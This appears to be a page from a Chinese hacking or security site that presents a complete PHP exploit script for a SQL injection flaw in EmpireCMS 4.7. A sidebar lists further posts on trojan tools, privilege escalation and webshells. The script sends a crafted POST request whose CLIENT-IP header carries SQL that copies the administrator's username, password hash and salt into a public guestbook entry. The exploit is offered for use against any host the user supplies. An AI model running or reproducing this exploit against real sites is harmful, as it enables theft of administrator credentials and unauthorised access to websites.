|
EmpireCMS47 SQL注入漏洞利用代码:
| 以下是引用片段: <?php print_r(" +------------------------------------------------------------------+ Exploit For EmpireCMS47 Just work as php>=5&mysql>=4.1 BY t00ls.net +------------------------------------------------------------------+ "); if ($argc<3) { echo "Usage: php ".$argv[0]." host path \n"; echo "host: target server \n"; echo "path: path to EmpireCMS47\n"; echo "Example:\r\n"; echo "php ".$argv[0]." localhost /\n"; die; } $host=$argv[1]; $path=$argv[2]; $data = "name=11ttt&email=111&call=&lytext=1111&enews=AddGbook"; $cmd = "aaaaaaaa',0,1,''),('t00lsxxxx','t00lsxxxxx','','2008-05-28 15:44:17',(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),'',1,'1111',0,0,'')/*"; $message = "POST ".$path."/e/enews/index.php"." HTTP/1.1\r\n"; $message .= "Referer: http://".$host.$path."/e/tool/gbook/?bid=1\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "CLIENT-IP: $cmd\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ".strlen($data)."\r\n"; $message .= "Cookie: ecmsgbookbid=1;\r\n"; $message .= "Connection: Close\r\n"; $message .= "\r\n"; $message .=$data; $ock=fsockopen($host,80); if (!$ock) { echo 'No response from '.$host; die; } echo "[+]connected to the site!\r\n"; echo "[+]sending data now……\r\n"; fputs($ock,$message); @$resp =''; while ($ock && !feof($ock)) $resp .= fread($ock, 1024); echo $resp; echo "[+]done!\r\n"; echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see the hash,good luck" ?> |
| 强悍挂马工具:IIS_AD IIS扩展(附 | 05-04 |
| Real Player rmoc3260.dll Activ | 04-04 |
| Real Player rmoc3260.dll Activ | 04-03 |
| Pangolin号称很牛的注入工具 | 03-25 |
| 仿FirePack网马管理系统fsploit | 03-01 |
| 机器狗生成器 | 02-26 |
| Serv-U 6.X 提权脚本 | 01-31 |
| 入侵工具Knark的分析及防范 | 01-14 |
| 如何使用Nikto漏洞扫描工具检测网 | 12-21 |
| 十三WEBSHELL终结版后门的去除过 | 12-14 |
| hijack(红狼安全小组原创作品 - | 11-29 |
| 高级内网渗透工具:Paris (创建VP | 11-01 |